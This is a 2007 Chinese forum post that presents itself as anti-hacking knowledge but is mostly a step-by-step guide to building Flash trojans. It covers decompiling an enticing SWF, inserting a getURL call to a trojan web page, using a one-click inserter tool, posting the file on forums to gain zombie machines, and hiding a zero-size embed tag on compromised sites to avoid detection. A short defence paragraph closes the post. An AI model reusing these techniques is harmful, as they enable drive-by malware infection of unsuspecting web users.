设为首页收藏本站官方微博
开启辅助访问 切换到窄版

飘云阁

 找回密码
 加入我们

QQ登录

只需一步,快速开始

[x86]PYG官方Dll优雅破解补丁制作工具[x64]PYG官方DLL优雅破解补丁制作工具[x86]PYG官方Exe优雅破解补丁制作工具[x86/x64]Baymax Patch Tools
返回列表 发新帖
查看: 1681|回复: 1

反黑知识 Flash木马是怎么炼成的

[复制链接]
135HACK
  • TA的每日心情
    郁闷
    2022-11-10 23:42

    • 签到天数: 5 天

    [LV.2]偶尔看看I
    发表于 2007-9-15 01:00:51 | 显示全部楼层 |阅读模式
    反黑知识 Flash木马是怎么炼成的
    一、制作flash动画木马的准备

      flash动画木马的原理,是在网页中显示或本地直接播放flash动画木马时,让flash自动打开一个网址,而该网址就是我们预先制作好的一个木马网页。也就是说,在制作网页木马前,我们首先需要制作好一个网页木马,并将它放置到某个网站上去。

      另外,我们还需要准备一个比较吸引人的flash动画文件“mm热舞.swf”,以及flash动画反编译工具“闪客精灵”,编辑工具macromedia flash mx。

      二、最原始的flash木马

      现在虽然有了许多各种各样的flash动画木马制作工具,但是为了了解flash动画木马的最基本原理,有必要从头开始用最原始的方法制作一个flash木马。

      步骤一:反编译swf动画

      首先我们需要将要插入网页木马的flash动画文件“mm热舞.swf”,反编译成可编辑的.fla格式。运行“闪客精灵”,点击菜单“文件” →“快速打开”命令,指定“mm热舞.swf”文件将其导入。然后点击工具栏上的“导出fla”命令,将动画导出为“mm热舞.fla”文件。

      步骤二:插入网页木马代码

      然后运行flash动画编辑器macromedia flash mx,点击菜单“文件”→“打开”,调入刚才保存的fla文件。展开界面下方的“动作/帧”栏,再展开“动作”→“浏览器/网络”项,点击其中的 “geturl”命令,在右边窗口中的“url”里面输入我们的网页木马地址;窗口方式为“_blank”;“变量”设置为“使用get方式发送”,在下方的代码窗口中将出现“geturl("http://网页木马地址", "_blank", "get");”。

      步骤三:生成flash木马

      设置完毕后保存文件,并点击菜单“文件”→“发布”命令,将动画重新导出为swf格式。用ie浏览器打开刚才生成的flash动画木马,可以看到随着flash动画打开播放时,自动弹出一个浏览器窗口,里面将会显示我们的木马网页。$page_devide$

      三、简简单单生成flash木马

      上面插入木马的过程比较麻烦,下面我们介绍一个简单的方法,也正是这些简单的工具使得flash木马在网上随处可见。

      运行swf木马插入器,点击界面中的“选择”按钮,浏览指定要插入木马的swf文件;在“插入代码”中输入木马网页的地址;切记不要勾选下面的 “只解压”项。设置完毕后,点击“给我插”按钮,程序提示开始插入木马网页。显示成功信息后,关闭程序,用ie打开生成的动画,可以看到自动跳转到木马网页去了。

      四、flash木马的利用

      看到上面的步骤了吧,生成一个flash动画木马是不是很简单?那么生成的flash木马该如何应用呢?只要我们将flash上传到某个网站中,就可以通过论坛或网站之类的直接利用了。

      大部分的论坛中都可以发来flash动画的帖子,利用论坛发帖,攻击者可以快速获得大量的肉鸡。以phpwind v4.3.2 论坛为例,在发帖或回复时,点击编辑窗口上方的“插入flash动画”按钮,设置flash窗口大小,使用默认设置后,要求输入flash的url地址。确定后,可以看到编辑窗口中显示的代码为““(flash=400,300)hxxp: //www.flash**.com.cn/upfiles/20067**.swf(/flash)””,这就是完整的flash播放代码了,不同的论坛代码是不一样的。

      应用二:网页嵌入flash木马

      攻击者入侵了某个大的网站之后,很可能在网站首页挂马,使用普通方式挂马会被管理员发觉,但是挂上flash木马的话,是很难查杀的。攻击者可能在网页中插入如下代码:

      “《embed src=http://网页木马地址/木马.swf width=0 height=0 type=application/x-shockwave-flash autostart="false" showstatusbar="false"》”,其中的《》改为<>。

      这里的参数“width=0 height=0”表示,flash播放窗口为零,也就是不显示flash播放窗口。其它用户浏览网页时,就会莫名其妙的弹出一个木马网页窗口。

      五、关于flash木马的防范

      其实不管flash木马有多么的巧妙,最终都是要跳转到木马网页去的,也就是说我们最终要防范的还是网页木马。了解了思路,对于flash动画木马就简单了:

      首先,要开启windows xp sp2的窗口拦截窗口功能,或安装其它防弹出窗口的插件。如果那个漏网之鱼,莫名其妙弹出的网页窗口要及时的关闭。另外,一定要在上网浏览时开启杀毒软件的网页监控功能,只要网页木马在后台一下载到本地硬盘,就会被杀毒软件查杀,这样就万事无忧了!
    PYG19周年生日快乐!
    回复

    使用道具 举报

    firecow
  • TA的每日心情
    开心
    2021-6-14 20:49

    • 签到天数: 3 天

    [LV.2]偶尔看看I
    发表于 2007-9-15 12:01:08 | 显示全部楼层
    对于菜鸟来说,可是个不错的文章哦~
    PYG19周年生日快乐!
    回复 支持 反对

    使用道具 举报

    返回列表 发新帖
    高级模式
    B Color Image Link Quote Code Smilies
    您需要登录后才可以回帖 登录 | 加入我们

    本版积分规则

    快速回复 返回顶部 返回列表